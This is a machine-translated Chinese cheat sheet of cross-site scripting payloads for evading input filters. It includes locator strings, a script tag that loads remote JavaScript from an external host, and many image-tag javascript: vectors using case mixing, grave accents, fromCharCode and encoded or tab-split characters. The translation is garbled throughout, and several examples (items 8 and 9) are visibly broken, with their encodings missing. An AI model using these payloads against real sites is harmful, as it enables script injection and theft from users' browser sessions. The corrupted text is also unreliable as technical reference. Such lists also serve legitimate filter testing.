1.XSS定位器。注射這根弦,而且在大多數情況下,腳本是脆弱的,沒有特殊要求XSS向量單詞“XSS”會流行起來。使用計算器下面網址(URL)編碼的編碼整個字符串。提示:如果你在墊子,需要快速檢查一頁,多次注射貶值" <PLAINTEX>“標籤就足以去看看一些易受XSS的輸出略微把房間弄得亂七八糟。
實例:';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
2.SSS定位器2。如果你沒有多少空間和知沒有脆弱的JavaScript頁面上,該字符串是一個很好的緊湊XSS注射檢查。查看源注入後它,並且尋找< XSS詩句,< XSS看看它是脆弱的
代碼:'';!--"<XSS>=&{()}
3.沒有濾鏡迴避。這是一個正常的XSS JavaScript注射,最容易被逮住了,但我建議嘗試它第一次(引號不需要在任何現代瀏覽器,所以他們被忽略了這裏)
代碼:<SCRIPT SRC=www.xxx.xom/xss.js></SCRIPT>
4.使用圖像XSS JavaScript指令(IE7.0不支持JavaScript指令在上下文的一個形象,但它在其他場合,但下列顯示原理工作,這將在其他標籤——我可能會修改本在以後的日子裏)
代碼:1)<IMG SRC="javascript:alert('XSS');">
2)<IMG SRC=javascript:alert('XSS')>
3)<IMG SRC=JaVaScRiPt:alert('XSS')>
4)<IMG SRC=javascript:alert("XSS")>
5.口音含糊不清的墳墓(如果你需要同時使用單引號增加了一倍,你可以使用一個墳墓的口音來封裝JavaScript字符串-這也是有用的,因爲很多跨站腳本過濾器不知道嚴重口音)
代碼:<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
6.畸形圖片標籤。Begeek最初發現(但清理乾淨,縮短工作在所有的瀏覽器),該XSS向量採用輕鬆渲染器來創造我們XSS向量在一個圖片標籤應封裝在引號。我猜這是原來的意思是到正確的邋遢的代碼。這將使它更明顯的很難正確地解析HTML標籤
代碼:<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
7.fromCharCode(如果沒有任何類型的引用允許():你可以在fromCharCode JavaScript創造任何XSS向量你需要)
代碼:<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
8.utf - 8的字符編碼標準編碼的例子,使用javascript XSS指令裏面的一個<圖片標籤並不會在火狐或n etscape4 . +在壁虎渲染器模式)。使用XSS計算器,以獲取更多信息
代碼:<IMGSRC=javascript:alert('XSS')>
<IMGSRC=javascript:alert('XSS')>
9.無分號(十六進制編碼這也是一個可行的XSS***上述字符串$tmp_string= ~ s /。* \ & #(\ d +);。* / 1$/,假設有一個數字字符以下英鎊符號-這是不符合事實的利用六角HTML字符)。使用XSS計算器,以獲取更多信息
代碼:<IMGSRC=javascript:alert('XSS')>
10.嵌入式標籤打破了跨站腳本***
代碼:<IMG SRC="jav ascript:alert('XSS');">
11.嵌入式編碼標籤分手XSS
代碼:<IMG SRC="jav	ascript:alert('XSS');">